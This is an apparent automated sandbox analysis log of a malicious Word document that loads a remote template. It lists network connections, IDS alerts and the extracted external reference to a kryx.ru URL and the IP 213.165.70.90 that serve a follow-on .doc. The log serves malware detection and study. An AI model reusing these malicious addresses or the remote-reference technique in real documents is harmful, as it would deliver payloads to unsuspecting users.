Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.24:53978
Source: global trafficTCP traffic: 192.168.2.24:53978 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53973 -> 213.165.70.90:80
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53973
Source: global trafficTCP traffic: 213.165.70.90:80 -> 192.168.2.24:53977
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: global trafficTCP traffic: 192.168.2.24:53977 -> 213.165.70.90:80
Source: winword.exeMemory has grown: Private usage: 1MB later: 70MB

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:53977 -> 213.165.70.90:80
Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.24:53975 -> 188.225.72.170:443
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.24:53969 -> 188.225.72.170:443
Source: Joe Sandbox ViewASN Name: TIMEWEB-ASRU TIMEWEB-ASRU
Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
Source: Joe Sandbox ViewJA3 fingerprint: 258a5a1e95b8a911872bae9081526644
Source: global trafficHTTP traffic detected: GET /8IJcFB?&bangladesh=abstracted&change HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /346/fusce/givenbestresultswithglorryeyeshappiness________givenbestresultswithglorryeyeshappiness_________givenbestresultswithglorryeyeshappiness.doc?&explanation=puffy&bestseller HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: unknownTCP traffic detected without corresponding DNS query: 213.165.70.90
Source: global trafficHTTP traffic detected: GET /8IJcFB?&bangladesh=abstracted&change HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: kryx.ruConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /346/fusce/givenbestresultswithglorryeyeshappiness________givenbestresultswithglorryeyeshappiness_________givenbestresultswithglorryeyeshappiness.doc?&explanation=puffy&bestseller HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)UA-CPU: AMD64Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: 213.165.70.90
Source: global trafficDNS traffic detected: DNS query: kryx.ru
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53969
Source: unknownNetwork traffic detected: HTTP traffic on port 53971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53967
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53978
Source: unknownNetwork traffic detected: HTTP traffic on port 53967 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53971
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53975
Source: unknownNetwork traffic detected: HTTP traffic on port 53978 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53975 -> 443
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.24:53967 version: TLS 1.2
Source: classification engineClassification label: mal60.evad.winDOC@2/1@1/2
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$_______03M4138.docx.bin.docJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{30659672-00F9-4237-86B0-75B07A8EE9FD} - OProcSessId.datJump to behavior
Source: _________03M4138.docx.bin.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: _________03M4138.docx.bin.docVirustotal: Detection: 9%
Source: unknownProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: _________03M4138.docx.bin.docInitial sample: OLE zip file path = word/_rels/header2.xml.rels
Source: _________03M4138.docx.bin.docInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files\Microsoft Office\root\vfs\System\MSVCR100.dllJump to behavior
Source: _________03M4138.docx.bin.docInitial sample: OLE indicators vbamacros = False

Persistence and Installation Behavior

barindex
Contains an external reference to another file
Source: settings.xml.relsExtracted files from sample: https://kryx.ru/8ijcfb?&bangladesh=abstracted&change
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
